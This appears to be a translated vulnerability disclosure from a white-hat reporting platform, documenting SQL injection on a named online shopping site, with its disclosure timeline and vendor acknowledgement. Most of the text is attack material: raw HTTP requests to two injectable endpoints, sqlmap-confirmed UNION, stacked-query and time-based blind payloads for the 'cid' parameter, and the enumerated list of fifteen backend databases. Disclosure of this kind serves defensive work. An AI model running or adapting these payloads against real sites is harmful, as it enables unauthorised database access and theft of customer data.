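2015-10-26: Details reported to the vendor; awaiting vendor handling
2015-10-26: Vendor confirmed; details disclosed to the vendor only
2015-11-05: Details disclosed to core white hats and relevant domain experts
2015-11-15: Details disclosed to regular white hats
2015-11-25: Details disclosed to trainee white hats
2015-12-10: Details disclosed to the public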
Website: www.yangtianclub.com
2 injection points
GET /goodList.aspx?cid=2 HTTP/1.1
Referer: http://www.yangtianclub.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Host: www.yangtianclub.com
Cookie: ASP.NET_SessionId=j5l4sz450gnnlvewppbthwmr; ActivityShoppingCart=820|1; 935|1=; 830|1=; 850|1=; 841|1=; LastShoppingCart=3
Accept-Encoding: gzip, deflate

POST /common/memberActivity.ashx HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Origin: http://www.yangtianclub.com
Referer: http://www.yangtianclub.com/memberActive.aspx
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: www.yangtianclub.com
Cookie: ActivityShoppingCart=; 935|1=; 830|1=; 850|1=; 841|1=; LastShoppingCart=3; 959=; 834=; 958=; 847=; 816=; 841=; 827=; 811|1=; 923|1=; 828|1=; 825|1=; 821|1=; 923|3=
Content-Length: 9
Accept-Encoding: gzip, deflate

usercode=
Databases
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cid
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: cid=-5121' UNION ALL SELECT CHAR(113)+CHAR(115)+CHAR(119)+CHAR(112)+CHAR(113)+CHAR(79)+CHAR(103)+CHAR(117)+CHAR(81)+CHAR(97)+CHAR(103)+CHAR(68)+CHAR(115)+CHAR(72)+CHAR(73)+CHAR(113)+CHAR(103)+CHAR(97)+CHAR(119)+CHAR(113)--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: cid=2'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: cid=2' WAITFOR DELAY '0:0:5'--
---
[03:52:52] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[03:52:52] [INFO] fetching database names
[03:52:52] [WARNING] reflective value(s) found and filtering out
[03:52:52] [INFO] the SQL query used returns 15 entries
[03:52:52] [INFO] retrieved: "abcprodb"
[03:52:53] [INFO] retrieved: "airchinacodeshopnew"
[03:52:53] [INFO] retrieved: "airchinacodeshopprodb"
[03:52:53] [INFO] retrieved: "airchinaprodb"
[03:52:53] [INFO] retrieved: "airchinav2db"
[03:52:54] [INFO] retrieved: "AirVirtualGoodsDB"
[03:52:54] [INFO] retrieved: "distribution"
[03:52:54] [INFO] retrieved: "jjprodb"
[03:52:54] [INFO] retrieved: "master"
[03:52:55] [INFO] retrieved: "model"
[03:52:55] [INFO] retrieved: "msdb"
[03:52:55] [INFO] retrieved: "nlprodb"
[03:52:55] [INFO] retrieved: "qqprodb"
[03:52:56] [INFO] retrieved: "tempdb"
[03:52:56] [INFO] retrieved: "ytprodb"
available databases [15]:
[*] abcprodb
[*] airchinacodeshopnew
[*] airchinacodeshopprodb
[*] airchinaprodb
[*] airchinav2db
[*] AirVirtualGoodsDB
[*] distribution
[*] jjprodb
[*] master
[*] model
[*] msdb
[*] nlprodb
[*] qqprodb
[*] tempdb
[*] ytprodb
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-10-26 11:41
Thank you for your attention to and support of Lenovo's information security work!
None yet